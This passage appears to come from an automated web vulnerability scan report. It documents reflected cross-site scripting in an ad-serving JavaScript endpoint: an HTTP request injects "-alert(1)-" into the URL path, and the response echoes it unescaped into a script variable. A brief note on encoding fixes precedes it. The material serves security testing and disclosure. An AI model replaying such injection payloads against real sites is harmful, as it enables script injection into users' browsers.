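Running it shows context A executing alert(1) with the vulnerable template and leaving adsafeSrc as NaN, while the encoded template round-trips the payload as an inert string. For context B the scanner's ';alert(1)// payload produces a SyntaxError because document.write( is never closed, the expression-form variant executes, and the layered encoding neutralises both the JavaScript-string and the HTML-attribute break-out.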

Request

GET /jss/adj/N1243.Glam.com/B5234896.782738"-alert(1)-"fe73189adbc;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf? HTTP/1.1
Host: ad.doubleclick.net.76705.9611.302br.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 02 May 2011 13:10:04 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=747EAAAC9846E913BFE9893D53CCA3D8; Path=/
Connection: keep-alive
Content-Length: 2698


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://celebrities.glam.com/",
   adsafeSrc : "http://ad.doubleclick.net.76705.9611.302br.net/fw/adj/N1243.Glam.com/B5234896.782738"-alert(1)-"fe73189adbc;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1
...[SNIP]...

6.76. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain